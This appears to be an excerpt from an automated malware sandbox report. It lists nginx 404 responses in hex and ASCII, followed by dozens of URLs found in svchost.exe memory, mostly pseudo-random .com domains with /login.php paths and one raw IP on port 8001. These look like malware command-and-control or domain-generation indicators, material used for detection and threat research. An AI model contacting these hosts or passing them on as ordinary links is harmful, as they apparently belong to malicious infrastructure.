Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 16:48:36 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 16:48:37 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 23 Aug 2024 16:48:59 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 23 Aug 2024 16:48:59 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 16:49:01 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 16:49:01 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: svchost.exe, 00000001.00000002.2910643811.0000000000871000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://106.15.137.66:8001/dh/147287063_637385.html
Source: svchost.exe, 00000001.00000003.2679082243.0000000009201000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911856330.0000000002661000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2801351584.0000000002661000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.com
Source: svchost.exe, 00000001.00000002.2911856330.0000000002661000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.com0
Source: svchost.exe, 00000001.00000003.2036392880.000000000263A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.comcom
Source: svchost.exe, 00000001.00000002.2911000726.00000000008B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2188198886.0000000002665000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.comhttp://106.15.137.66:8001/dh/
Source: login[4].htm.1.dr	String found in binary or memory: http://InquiryGrid.com/sk-domsale.php?dom=galyqaz.com&eds=YnJva2VyYWdlQHNrZW56by5jb20%3D&_isk_=7444&
Source: svchost.exe, 00000001.00000003.2228803064.00000000008ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gadyciz.com/login.php
Source: svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911300230.00000000008EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gadyniw.com/login.php
Source: svchost.exe, 00000001.00000002.2911000726.00000000008B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gadyniw.com/login.php/
Source: svchost.exe, 00000001.00000002.2911300230.00000000008EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gadyniw.com/login.php3
Source: svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gadyniw.com/login.phpMy
Source: svchost.exe, 00000001.00000003.2195591504.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2868232084.000000000266E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867988784.000000000266C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000266F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gahyhiz.com/login.php
Source: svchost.exe, 00000001.00000003.1688021154.000000000267C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2046828738.000000000267A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gahyqah.com/login.php
Source: svchost.exe, 00000001.00000003.2228803064.00000000008ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://galynuh.com/login.php
Source: svchost.exe, 00000001.00000003.2784846138.000000000087F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://galynuh.com/login.php.
Source: login[4].htm.1.dr	String found in binary or memory: http://galyqaz.com/Computerspiele.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52yaSTG4D
Source: login[4].htm.1.dr	String found in binary or memory: http://galyqaz.com/IT_Services.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52yaSTG4DW2o
Source: login[4].htm.1.dr	String found in binary or memory: http://galyqaz.com/Networking_Services.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52ya
Source: svchost.exe, 00000001.00000003.2274238543.0000000009206000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://galyqaz.com/Personals.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGtsEGsOf%2BBeruClQxv
Source: login[4].htm.1.dr	String found in binary or memory: http://galyqaz.com/Personals.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52yaSTG4DW2oyV
Source: login[4].htm.1.dr	String found in binary or memory: http://galyqaz.com/Search_Engine_Ranking.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52
Source: login[4].htm.1.dr	String found in binary or memory: http://galyqaz.com/display.cfm
Source: svchost.exe, 00000001.00000003.1688021154.000000000267C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2046828738.000000000267A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://galyqaz.com/login.php
Source: svchost.exe, 00000001.00000002.2911000726.00000000008B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://galyqaz.com/login.php0
Source: svchost.exe, 00000001.00000003.2046828738.000000000267A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gatyfus.com/login.php
Source: svchost.exe, 00000001.00000003.2195591504.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gatyfus.com/login.phpd%
Source: svchost.exe, 00000001.00000003.2784846138.000000000087F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2868232084.000000000266E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867988784.000000000266C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000266F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gatyhub.com/login.php
Source: login[4].htm.1.dr	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
Source: login[4].htm.1.dr	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
Source: login[4].htm.1.dr	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
Source: login[4].htm.1.dr	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
Source: login[4].htm.1.dr	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
Source: login[4].htm.1.dr	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
Source: login[4].htm.1.dr	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
Source: login[4].htm.1.dr	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
Source: login[4].htm.1.dr	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
Source: login[4].htm.1.dr	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
Source: login[4].htm.1.dr	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
Source: login[4].htm.1.dr	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
Source: login[4].htm.1.dr	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
Source: login[4].htm.1.dr	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
Source: login[4].htm.1.dr	String found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.3
Source: login[4].htm.1.dr	String found in binary or memory: http://i2.cdn-image.com/__media__/pics/28903/search.png)
Source: login[4].htm.1.dr	String found in binary or memory: http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)
Source: login[4].htm.1.dr	String found in binary or memory: http://i2.cdn-image.com/__media__/pics/29590/bg1.png)
Source: svchost.exe, 00000001.00000003.2168457862.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2654498481.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911300230.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2228803064.00000000008ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lygyvuj.com/login.php
Source: svchost.exe, 00000001.00000003.1688021154.000000000267C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2046828738.000000000267A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lymyxid.com/login.php
Source: svchost.exe, 00000001.00000003.2228803064.00000000008ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyrysor.com/login.php
Source: svchost.exe, 00000001.00000003.2046828738.000000000267A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lysyfyj.com/login.php
Source: login[1].htm.1.dr, login[2].htm0.1.dr	String found in binary or memory: http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cC
Source: svchost.exe, 00000001.00000003.1896894757.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2046828738.000000000267A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lysyvan.com/login.php
Source: svchost.exe, 00000001.00000003.2046828738.000000000267A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyvyxor.com/login.php
Source: svchost.exe, 00000001.00000003.2195591504.00000000008A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyvyxor.com/login.php_L
Source: svchost.exe, 00000001.00000003.2784846138.000000000087F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2868451599.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2195433175.00000000008EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2228769554.00000000008EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2168457862.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2654498481.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911300230.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2228803064.00000000008ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyxynyx.com/login.php
Source: svchost.exe, 00000001.00000003.2046828738.000000000267A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pupycag.com/login.php
Source: svchost.exe, 00000001.00000003.2046828738.000000000267A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pupydeq.com/login.php
Source: svchost.exe, 00000001.00000003.2046828738.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911300230.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911720784.0000000002644000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puzylyp.com/login.php
Source: svchost.exe, 00000001.00000003.2868451599.00000000008EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puzylyp.com/login.phpMy
Source: svchost.exe, 00000001.00000002.2911300230.00000000008EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qegyhig.com/login.php
Source: svchost.exe, 00000001.00000002.2910643811.0000000000871000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qegyhig.com/login.phpAppData
Source: svchost.exe, 00000001.00000003.2679116854.0000000009212000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867988784.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2654498481.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qegyval.com/login.php
Source: svchost.exe, 00000001.00000003.2046828738.000000000267A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qetyfuv.com/login.php
Source: svchost.exe, 00000001.00000003.2784846138.000000000087F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2107755824.000000000931B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2074934936.0000000009216000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2868232084.000000000266E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867988784.000000000266C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000266F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qetyhyg.com/login.php
Source: svchost.exe, 00000001.00000003.2228803064.00000000008ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qexyhuv.com/login.php
Source: svchost.exe, 00000001.00000003.2274238543.0000000009210000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vocyzit.com/login
Source: svchost.exe, 00000001.00000003.1728739248.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867988784.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1896894757.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1681450009.000000000267C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1688021154.000000000267C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2046828738.000000000267A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vocyzit.com/login.php
